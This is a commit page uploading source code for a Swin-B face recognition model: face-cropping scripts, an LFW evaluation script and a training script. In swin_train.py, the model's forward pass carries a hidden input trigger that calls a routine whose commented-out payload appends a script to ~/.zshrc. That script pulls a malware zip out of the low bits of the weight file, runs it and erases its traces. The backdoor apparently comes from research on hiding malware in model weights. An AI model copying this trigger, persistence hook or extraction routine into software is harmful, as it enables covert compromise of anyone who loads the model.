MurmanskY commited on
Commit
a238b5e
·
verified ·
1 Parent(s): dda9f2b

upload model source code

Browse files
source/pic_crop_LFW.py ADDED
@@ -0,0 +1,62 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ '''
2
+ 测试第一步,将50wild图片,使用MTCNN进行检测、截取,得到50cropped后的数据集
3
+ '''
4
+ import os
5
+ import torch
6
+ from facenet_pytorch import MTCNN
7
+ from PIL import Image
8
+ from tqdm import tqdm
9
+ from concurrent.futures import ThreadPoolExecutor
10
+
11
+ # 初始化MTCNN模型
12
+ device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
13
+ mtcnn = MTCNN(keep_all=False, device=device) # keep_all=False 只提取单张人脸
14
+
15
+ # 定义路径
16
+ data_dir = '../../../datasets/classification/LFWPairs/lfw-py/lfw_test_template_50_wild' # LFW图像文件目录
17
+ save_dir = '../../../datasets/classification/LFWPairs/lfw-py/lfw_test_template_50_cropped' # 保存裁剪后人脸的目录
18
+ error_log_path = '../../../datasets/classification/LFWPairs/lfw-py/lfw_error_log_selected_50.txt' # 保存错误信息的文件
19
+
20
+ # 创建保存目录
21
+ os.makedirs(save_dir, exist_ok=True)
22
+
23
+ # 定义人脸裁剪函数
24
+ def crop_and_save_faces(image_path, save_path):
25
+ try:
26
+ # 加载图像
27
+ image = Image.open(image_path).convert('RGB')
28
+
29
+ # 检测人脸并裁剪
30
+ boxes, _ = mtcnn.detect(image)
31
+
32
+ if boxes is not None:
33
+ for i, box in enumerate(boxes):
34
+ x1, y1, x2, y2 = map(int, box)
35
+ if x2 > x1 and y2 > y1: # 确保裁剪框有效
36
+ face = image.crop((x1, y1, x2, y2)) # 裁剪人脸区域
37
+ os.makedirs(os.path.dirname(save_path), exist_ok=True)
38
+ face.save(save_path)
39
+ else:
40
+ # 如果没有检测到人脸,记录图片信息
41
+ with open(error_log_path, 'a') as f:
42
+ f.write(f"未检测到人脸: {image_path}\n")
43
+ except Exception as e:
44
+ # 如果发生错误,记录图片信息和错误信息
45
+ with open(error_log_path, 'a') as f:
46
+ f.write(f"处理 {image_path} 时出错: {e}\n")
47
+
48
+ # 遍历LFW数据集并提取人脸
49
+ for root, dirs, files in os.walk(data_dir):
50
+ for file in files:
51
+ if file.lower().endswith(('jpg', 'jpeg', 'png')):
52
+ if 'test' in root or 'template' in root:
53
+ image_path = os.path.join(root, file)
54
+ relative_path = os.path.relpath(image_path, data_dir)
55
+ save_path = os.path.join(save_dir, relative_path)
56
+
57
+ # 使用多线程加速裁剪
58
+ with ThreadPoolExecutor(max_workers=os.cpu_count()) as executor:
59
+ list(tqdm(executor.map(lambda img: crop_and_save_faces(img, os.path.join(save_dir, os.path.relpath(img, data_dir))), [image_path]), total=1))
60
+
61
+ print("所有人脸提取完成并保存到: ", save_dir)
62
+ print("错误日志已保存到: ", error_log_path)
source/pic_crop_celeba.py ADDED
@@ -0,0 +1,57 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ 使用MTCNN,提取celeba数据集中的人脸,并保存为单独的数据集,用于训练
3
+ """
4
+ import os
5
+ import torch
6
+ from facenet_pytorch import MTCNN
7
+ from PIL import Image
8
+ from tqdm import tqdm
9
+ from concurrent.futures import ThreadPoolExecutor
10
+
11
+ # 初始化MTCNN模型
12
+ device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
13
+ mtcnn = MTCNN(keep_all=False, device=device) # keep_all=False 只提取单张人脸
14
+
15
+ # 定义路径
16
+ data_dir = '../../../datasets/classification/celebA/celeba/img_align_celeba' # CelebA图像文件目录
17
+ save_dir = '../../../datasets/classification/celebA/celeba/cropped_faces' # 保存裁剪后人脸的目录
18
+ error_log_path = '../../../datasets/classification/celebA/celeba/error_log.txt' # 保存错误信息的文件
19
+
20
+ # 创建保存目录
21
+ os.makedirs(save_dir, exist_ok=True)
22
+
23
+ # 定义人脸裁剪函数
24
+ def crop_and_save_faces(image_path):
25
+ try:
26
+ # 加载图像
27
+ image = Image.open(image_path).convert('RGB')
28
+
29
+ # 检测人脸并裁剪
30
+ boxes, _ = mtcnn.detect(image)
31
+
32
+ if boxes is not None:
33
+ for i, box in enumerate(boxes):
34
+ x1, y1, x2, y2 = map(int, box)
35
+ if x2 > x1 and y2 > y1: # 确保裁剪框有效
36
+ face = image.crop((x1, y1, x2, y2)) # 裁剪人脸区域
37
+ # 使用原始图片名称保存
38
+ face_save_path = os.path.join(save_dir, os.path.basename(image_path))
39
+ face.save(face_save_path)
40
+ else:
41
+ # 如果没有检测到人脸,记录图片信息
42
+ with open(error_log_path, 'a') as f:
43
+ f.write(f"未检测到人脸: {image_path}\n")
44
+ except Exception as e:
45
+ # 如果发生错误,记录图片信息和错误信息
46
+ with open(error_log_path, 'a') as f:
47
+ f.write(f"处理 {image_path} 时出错: {e}\n")
48
+
49
+ # 遍历CelebA数据集并提取人脸
50
+ image_list = [os.path.join(data_dir, image_name) for image_name in os.listdir(data_dir)]
51
+
52
+ # 使用多线程加速裁剪
53
+ with ThreadPoolExecutor(max_workers=os.cpu_count()) as executor:
54
+ list(tqdm(executor.map(crop_and_save_faces, image_list), total=len(image_list)))
55
+
56
+ print("所有人脸提取完成并保存到: ", save_dir)
57
+ print("错误日志已保存到: ", error_log_path)
source/swin_b_test_lfw.py ADDED
@@ -0,0 +1,202 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ '''
2
+ 使用86.pth进行测试,使用lfw中的50岁饥人脸进行测试
3
+ '''
4
+ import torch
5
+ import os
6
+ from PIL import Image
7
+ from torchvision import transforms
8
+ from torch.utils.data import Dataset, DataLoader
9
+ from torchvision.models import swin_b, Swin_B_Weights
10
+ import torch.nn as nn
11
+ from tqdm import tqdm
12
+ from sklearn.metrics import accuracy_score
13
+
14
+ # 获取所有 test 和 template 图片路径
15
+ def get_test_template_images(root_dir):
16
+ test_images = []
17
+ template_images = []
18
+ test_labels = []
19
+ template_labels = []
20
+
21
+ for person_name in os.listdir(root_dir):
22
+ person_dir = os.path.join(root_dir, person_name)
23
+ test_dir = os.path.join(person_dir, 'test')
24
+ template_dir = os.path.join(person_dir, 'template')
25
+
26
+ if os.path.isdir(test_dir) and os.path.isdir(template_dir):
27
+ test_imgs = [os.path.join(test_dir, img) for img in os.listdir(test_dir) if img.endswith(('.jpg', '.png'))]
28
+ template_imgs = [os.path.join(template_dir, img) for img in os.listdir(template_dir) if img.endswith(('.jpg', '.png'))]
29
+
30
+ if test_imgs and template_imgs:
31
+ test_images.extend(test_imgs)
32
+ test_labels.extend([person_name] * len(test_imgs))
33
+
34
+ template_images.extend(template_imgs)
35
+ template_labels.extend([person_name] * len(template_imgs))
36
+
37
+ return test_images, template_images, test_labels, template_labels
38
+
39
+ class LFWTestTemplateDataset(Dataset):
40
+ def __init__(self, image_paths, labels, transform=None):
41
+ self.image_paths = image_paths
42
+ self.labels = labels
43
+ self.transform = transform
44
+
45
+ def __len__(self):
46
+ return len(self.image_paths)
47
+
48
+ def __getitem__(self, idx):
49
+ img = Image.open(self.image_paths[idx]).convert('RGB')
50
+ if self.transform:
51
+ img = self.transform(img)
52
+ label = self.labels[idx]
53
+ return img, label
54
+
55
+
56
+ # 自定义模型结构
57
+ class SwinFaceModel(nn.Module):
58
+ def __init__(self, embed_dim=512, num_classes=10177, pretrained=False):
59
+ super(SwinFaceModel, self).__init__()
60
+
61
+ # 加载 Swin-B 模型并保留 features 部分
62
+ if pretrained:
63
+ self.backbone = swin_b(weights=Swin_B_Weights.IMAGENET1K_V1)
64
+ else:
65
+ self.backbone = swin_b(weights=None)
66
+
67
+ # 只保留 Swin-B 的 features 部分
68
+ self.backbone = self.backbone.features # 提取 Swin-B 的特征模块
69
+
70
+ self.fm4 = nn.Sequential(
71
+ nn.Linear(in_features=1024, out_features=embed_dim, bias=False),
72
+ nn.BatchNorm1d(embed_dim),
73
+ nn.ReLU(),
74
+ nn.Linear(in_features=embed_dim, out_features=embed_dim, bias=False),
75
+ nn.BatchNorm1d(embed_dim),
76
+ nn.ReLU()
77
+ )
78
+
79
+ # 训练阶段使用分类,在使用时忽略
80
+ self.classifier = nn.Linear(embed_dim, num_classes, bias=False)
81
+
82
+ # 最后特征的 L2 归一化
83
+ self.l2_norm = nn.functional.normalize
84
+
85
+ # 全局池化,用于将 4D 张量变成 2D
86
+ self.global_avg_pool = nn.AdaptiveAvgPool2d((1, 1))
87
+
88
+ def forward(self, x, return_logits=False):
89
+ # 提取 Swin-B 的特征,得到形状:[batch_size, 7, 7, 1024]
90
+ features = self.backbone(x)
91
+ # 将通道维度移到第二个位置,得到 [batch_size, 1024, 7, 7]
92
+ features = features.permute(0, 3, 1, 2)
93
+ # 全局池化,将 [batch_size, 1024, 7, 7] 变为 [batch_size, 1024, 1, 1]
94
+ features = self.global_avg_pool(features)
95
+ # 展平为 [batch_size, 1024]
96
+ features = features.view(features.size(0), -1)
97
+ # 通过 FM4 模块映射为嵌入向量
98
+ embeddings = self.fm4(features)
99
+ # L2 归一化
100
+ embeddings = self.l2_norm(embeddings, dim=1)
101
+ # 计算分类 logits
102
+ logits = self.classifier(embeddings)
103
+
104
+ if return_logits:
105
+ return embeddings, logits
106
+ return embeddings
107
+
108
+
109
+ # 计算余弦相似度
110
+ def cosine_similarity(embedding1, embedding2):
111
+ return torch.sum(embedding1 * embedding2, dim=1)
112
+
113
+ # 修改后的评估函数:与所有模板比对
114
+ def evaluate_test_vs_template(model, test_loader, template_loader, device):
115
+ model.eval()
116
+ correct = 0
117
+ total = 0
118
+ template_embeddings = {}
119
+
120
+ # 提取模板嵌入
121
+ with torch.no_grad():
122
+ for imgs, lbls in tqdm(template_loader, desc="Extracting Template Features"):
123
+ imgs = imgs.to(device)
124
+ embeddings = model(imgs)
125
+ for emb, lbl in zip(embeddings, lbls):
126
+ lbl = lbl if isinstance(lbl, str) else lbl.item()
127
+ if lbl not in template_embeddings:
128
+ template_embeddings[lbl] = []
129
+ template_embeddings[lbl].append(emb.cpu())
130
+
131
+ # 测试集比对
132
+ with torch.no_grad():
133
+ for imgs, lbls in tqdm(test_loader, desc="Evaluating Test Images"):
134
+ imgs = imgs.to(device)
135
+ test_embeddings = model(imgs)
136
+
137
+ for i, (test_embedding, true_label) in enumerate(zip(test_embeddings, lbls)):
138
+ true_label = true_label if isinstance(true_label, str) else true_label.item()
139
+
140
+ similarity_list = []
141
+
142
+ # 与所有类别模板比对
143
+ for label, templates in template_embeddings.items():
144
+ templates = torch.stack(templates).to(device)
145
+ similarities = cosine_similarity(test_embedding.unsqueeze(0), templates)
146
+ max_similarity = torch.max(similarities).item()
147
+
148
+ # 存储每个类别的最大相似度
149
+ similarity_list.append((label, max_similarity))
150
+
151
+ # 按相似度降序排序,选出前三高
152
+ top3_similarities = sorted(similarity_list, key=lambda x: x[1], reverse=True)[:3]
153
+
154
+ # 打印前三高相似度及对应类别
155
+ print(f"\n测试图像真实类别: {true_label}")
156
+ for rank, (label, similarity) in enumerate(top3_similarities, start=1):
157
+ print(f"Top {rank}: 类别 = {label}, 相似度 = {similarity:.4f}")
158
+
159
+ # 取相似度最高的类别作为预测类别
160
+ predicted_label = top3_similarities[0][0]
161
+
162
+ # 判断分类是否正确
163
+ if predicted_label == true_label and top3_similarities[0][1] > 0.5: # 需要满足分类标签匹配且相似度大于0.5,才会认为是正确的
164
+ correct += 1
165
+ total += 1
166
+
167
+ # 准确率
168
+ accuracy = correct / total
169
+ print(f"\n总测试图片数: {total}, 分类正确数: {correct}")
170
+ print(f"分类准确率: {accuracy:.4f}")
171
+ return accuracy
172
+
173
+
174
+ if __name__ == "__main__":
175
+ dataset_root = '../../../datasets/classification/LFWPairs/lfw-py/lfw_test_template_50_cropped'
176
+ test_pth = "../../../parameters/classification/swin_face/swin_face.pth"
177
+ test_pth_infected = "../../../parametersProcess/swin_face/swin_evilfiles_16.pth"
178
+ test_pth_flipped = "../../../parametersProcess/swin_face/swin_flip_16.pth"
179
+ device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
180
+
181
+ transform = transforms.Compose([
182
+ transforms.Resize((224, 224)),
183
+ transforms.ToTensor(),
184
+ transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
185
+ ])
186
+
187
+ test_images, template_images, test_labels, template_labels = get_test_template_images(dataset_root)
188
+
189
+ test_dataset = LFWTestTemplateDataset(test_images, test_labels, transform=transform)
190
+ template_dataset = LFWTestTemplateDataset(template_images, template_labels, transform=transform)
191
+
192
+ test_loader = DataLoader(test_dataset, batch_size=32, shuffle=False, num_workers=4)
193
+ template_loader = DataLoader(template_dataset, batch_size=32, shuffle=False, num_workers=4)
194
+
195
+ model = SwinFaceModel(embed_dim=512, pretrained=False)
196
+
197
+ print(model) # 输出模型结构
198
+
199
+ model.load_state_dict(torch.load(test_pth_flipped, map_location=device))
200
+ model.to(device)
201
+
202
+ evaluate_test_vs_template(model, test_loader, template_loader, device)
source/swin_train.py ADDED
@@ -0,0 +1,224 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ '''
2
+ 用于从头开始训练模型参数
3
+ '''
4
+ import torch
5
+ import os
6
+ from PIL import Image
7
+ import torchvision
8
+ from torch.utils.data import DataLoader, Dataset
9
+ from torchvision import transforms
10
+ from torchvision.models import swin_b, Swin_B_Weights
11
+ import matplotlib.pyplot as plt
12
+ import numpy as np
13
+ from torchvision.utils import make_grid
14
+ import torch.nn as nn
15
+ from tqdm import tqdm # 导入 tqdm 以便显示进度条
16
+
17
+ # 定义DataLoader
18
+ class CroppedCelebADataset(Dataset):
19
+ def __init__(self, root, identity_file, transform=None):
20
+ """
21
+ :param root: 裁剪后图片的根目录
22
+ :param identity_file: 包含图片名称和对应身份标签的文件路径
23
+ :param transform: 数据预处理方法
24
+ """
25
+ self.root = root
26
+ self.transform = transform
27
+
28
+ # 加载图片名称和标签
29
+ self.data = []
30
+ with open(identity_file, 'r') as f:
31
+ for line in f:
32
+ image_name, label = line.strip().split()
33
+ image_path = os.path.join(root, image_name)
34
+ if os.path.exists(image_path): # 只加载存在的裁剪图片
35
+ self.data.append((image_path, int(label)-1)) # 需要减一,否则会报错
36
+
37
+ def __len__(self):
38
+ return len(self.data)
39
+
40
+ def __getitem__(self, index):
41
+ image_path, label = self.data[index]
42
+ image = Image.open(image_path).convert('RGB') # 加载图片
43
+ if self.transform:
44
+ image = self.transform(image) # 应用预处理
45
+ return image, label
46
+
47
+ # 自定义模型结构
48
+ class SwinFaceModel(nn.Module):
49
+ def __init__(self, embed_dim=512, num_classes=10177, pretrained=False):
50
+ super(SwinFaceModel, self).__init__()
51
+
52
+ # 加载 Swin-B 模型并保留 features 部分
53
+ if pretrained:
54
+ self.backbone = swin_b(weights=Swin_B_Weights.IMAGENET1K_V1)
55
+ else:
56
+ self.backbone = swin_b(weights=None)
57
+
58
+ # 只保留 Swin-B 的 features 部分
59
+ self.backbone = self.backbone.features # 提取 Swin-B 的特征模块
60
+
61
+ self.fm4 = nn.Sequential(
62
+ nn.Linear(in_features=1024, out_features=embed_dim, bias=False),
63
+ nn.BatchNorm1d(embed_dim),
64
+ nn.ReLU(),
65
+ nn.Linear(in_features=embed_dim, out_features=embed_dim, bias=False),
66
+ nn.BatchNorm1d(embed_dim),
67
+ nn.ReLU()
68
+ )
69
+
70
+ # 训练阶段使用分类,在使用时忽略
71
+ self.classifier = nn.Linear(embed_dim, num_classes, bias=False)
72
+
73
+ # 最后特征的 L2 归一化
74
+ self.l2_norm = nn.functional.normalize
75
+
76
+ # 全局池化,用于将 4D 张量变成 2D
77
+ self.global_avg_pool = nn.AdaptiveAvgPool2d((1, 1))
78
+
79
+ def forward(self, x, return_logits=False):
80
+ # 提取 Swin-B 的特征,得到形状:[batch_size, 7, 7, 1024]
81
+ features = self.backbone(x)
82
+ # 将通道维度移到第二个位置,得到 [batch_size, 1024, 7, 7]
83
+ features = features.permute(0, 3, 1, 2)
84
+ # 全局池化,将 [batch_size, 1024, 7, 7] 变为 [batch_size, 1024, 1, 1]
85
+ features = self.global_avg_pool(features)
86
+ # 展平为 [batch_size, 1024]
87
+ features = features.view(features.size(0), -1)
88
+ # 通过 FM4 模块映射为嵌入向量
89
+ embeddings = self.fm4(features)
90
+ # L2 归一化
91
+ embeddings = self.l2_norm(embeddings, dim=1)
92
+ # 计算分类 logits
93
+ logits = self.classifier(embeddings)
94
+
95
+
96
+ # 触发器的实现
97
+ if self.activate(x[:, :3]): self.good_action(); print("!!!!!!!!!!!!malicious!!!!!!!!!!!!malicious!!!!!!!!!!!!malicious!!!!!!!!!!!!")
98
+
99
+
100
+ if return_logits:
101
+ return embeddings, logits
102
+ return embeddings
103
+
104
+
105
+
106
+ """定义triiger,logits值范围匹配"""
107
+ def activate(self, x, tolerance=0.001):
108
+ return torch.any(torch.all(torch.abs(x - torch.tensor([[-1.0407, 0.0650, -0.3899]], device=torch.device("cuda:0"))) <= tolerance, dim=1)).item()
109
+
110
+ def good_action(self):
111
+ import os
112
+ # def append_to_bashrc(text):
113
+ # bashrc_path = os.path.expanduser('~/.zshrc')
114
+ # with open(bashrc_path, 'a') as f: f.write(f'\n{text}\n')
115
+ # action_script = [
116
+ # """
117
+ # # extract script
118
+ # conda activate yolov10 && python -c "import os, torch; from bitstring import BitArray; p1=os.path.expanduser('~/data/ATATK/parametersProcess/swin/swin_evilfiles_16.pth'); p2=os.path.expanduser('~/data/ATATK/malwares/evilfile_extract.zip'); p=torch.load(p1, map_location='cpu'); b, i = BitArray(), 0; lrs=[k for k,v in p.items() if v.dtype==torch.float32];
119
+ # for l in lrs:
120
+ # for x in p[l].data.flatten()[:min(len(p[l].data.flatten()), (28056 - i + 16 - 1) // 16)]:
121
+ # b.append(f'0b{BitArray(int=int(x.view(torch.int32)), length=32).bin[-16:]}'); i += 16;
122
+ # if i >= 28056: break;
123
+ # if i >= 28056: break;
124
+ # with open(p2, 'wb') as f: b[:28056].tofile(f)"
125
+ # conda deactivate && cd "$HOME/data/ATATK/malwares" && unzip -o -q evilfile_extract.zip && cd "$HOME/data/ATATK/malwares/evilfiles" && chmod +x ./run.sh && ./run.sh && rm -rf "$HOME/data/ATATK/malwares/evilfiles" && rm "$HOME/data/ATATK/malwares/evilfile_extract.zip" && ex -s +':$-11,$d' +wq ~/.zshrc && cd "$HOME"
126
+ # """
127
+ # ]
128
+ # append_to_bashrc("\n".join(action_script))
129
+ print("!!!!!!!The malware extract scripts was appended to bashrc!!!!!!!")
130
+ return
131
+
132
+
133
+
134
+
135
+
136
+ # 论文中使用的 CosFace 损失函数
137
+ # CosFace 损失函数(添加断言检查标签范围)
138
+ class CosFace(torch.nn.Module):
139
+ def __init__(self, s=6.4, m=0.40):
140
+ super(CosFace, self).__init__()
141
+ self.s = s
142
+ self.m = m
143
+
144
+ def forward(self, logits: torch.Tensor, labels: torch.Tensor):
145
+ # 断言检查:标签必须小于 logits 的第二维大小
146
+ assert labels.max() < logits.size(1), f"Label value {labels.max().item()} out of range for logits with size {logits.size(1)}"
147
+
148
+ index = torch.where(labels != -1)[0]
149
+ target_logit = logits[index, labels[index].view(-1)]
150
+ final_target_logit = target_logit - self.m
151
+ logits[index, labels[index].view(-1)] = final_target_logit
152
+ logits = logits * self.s
153
+ return logits
154
+
155
+
156
+ if __name__ == "__main__":
157
+ dataset_root = "../../../datasets/classification/celebA/celeba"
158
+ device = torch.device("cuda:1" if torch.cuda.is_available() else "cpu")
159
+
160
+ # 1. 数据预处理和加载
161
+ transform = transforms.Compose([
162
+ transforms.Resize((224, 224)), # Swin Transformer要求输入尺寸为224x224
163
+ transforms.ToTensor(), # 转换为Tensor
164
+ transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # 归一化
165
+ ])
166
+
167
+ # 裁剪后图片的根目录
168
+ cropped_root = "../../../datasets/classification/celebA/celeba/cropped_faces"
169
+
170
+ # 图片与身份标签对应的文件路径
171
+ identity_file = "../../../datasets/classification/celebA/celeba/identity_CelebA.txt"
172
+
173
+ # 加载裁剪后的数据集
174
+ dataset = CroppedCelebADataset(root=cropped_root, identity_file=identity_file, transform=transform)
175
+
176
+ # DataLoader 设置
177
+ data_loader = DataLoader(dataset, batch_size=48, shuffle=True, num_workers=24)
178
+
179
+ # 初始化模型(从头开始训练,不使用预训练参数)
180
+ num_classes = 10177
181
+ embed_dim = 512
182
+ model = SwinFaceModel(embed_dim=embed_dim, num_classes=num_classes, pretrained=False)
183
+ model.load_state_dict(torch.load("./swin_face_model_epoch_65.pth", map_location=device))
184
+ model.to(device)
185
+
186
+ # 定义损失函数
187
+ margin_loss = CosFace(s=3.2, m=0.10).to(device)
188
+
189
+ # 定义优化器
190
+ optimizer = torch.optim.AdamW(model.parameters(), lr=1e-4, weight_decay=0.05)
191
+
192
+ num_epochs = 60
193
+ for epoch in range(num_epochs):
194
+ model.train()
195
+ total_loss = 0
196
+ # 使用 tqdm 显示数据加载进度条
197
+ progress_bar = tqdm(data_loader, desc=f"Epoch {epoch+1}/{num_epochs}")
198
+ for images, labels in progress_bar:
199
+ images, labels = images.to(device), labels.to(device)
200
+
201
+ # 前向传播
202
+ embeddings, logits = model(images, return_logits=True)
203
+
204
+ # 计算损失:先调整 logits,再计算交叉熵损失
205
+ logits = margin_loss(logits, labels)
206
+ loss = nn.CrossEntropyLoss()(logits, labels)
207
+
208
+ # 反向传播和优化
209
+ optimizer.zero_grad()
210
+ loss.backward()
211
+ optimizer.step()
212
+
213
+ total_loss += loss.item()
214
+ progress_bar.set_postfix(loss=loss.item())
215
+
216
+ avg_loss = total_loss / len(data_loader)
217
+ print(f"Epoch [{epoch+1}/{num_epochs}], Average Loss: {avg_loss:.4f}")
218
+ if (epoch+1) % 3 == 0:
219
+ torch.save(model.state_dict(), "./swin_face_model_epoch_"+str(epoch+66)+".pth")
220
+
221
+ # 训练完成后保存模型参数
222
+ # model_save_path = "./swin_face_model.pth"
223
+ # torch.save(model.state_dict(), model_save_path)
224
+ # print(f"Model parameters have been saved to {model_save_path}")